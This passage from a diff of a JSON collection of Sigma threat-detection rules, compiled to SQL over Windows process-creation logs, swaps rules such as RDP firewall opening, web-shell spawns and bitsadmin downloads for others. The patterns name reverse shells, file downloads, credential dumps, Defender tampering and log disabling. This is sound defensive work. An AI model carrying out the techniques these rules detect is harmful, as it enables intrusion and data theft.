(CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate administration activity" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND 
CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - 
"attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' 
ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "status": "experimental", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "status": "experimental", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND 
CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", - "author": "frack113", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "status": "experimental", + "description": "Detects a remote file copy attempt to a 
hidden network share. This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", "tags": [ - "attack.collection", - "attack.t1005" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ - "Unknown" + "Other programs that cause these patterns (please report)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "status": "test", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND 
CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_node_abuse.yml" - }, - { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", - "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" - ], + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "status": "experimental", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE 
'\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_susp_download_office_domain.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af 
%' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE 
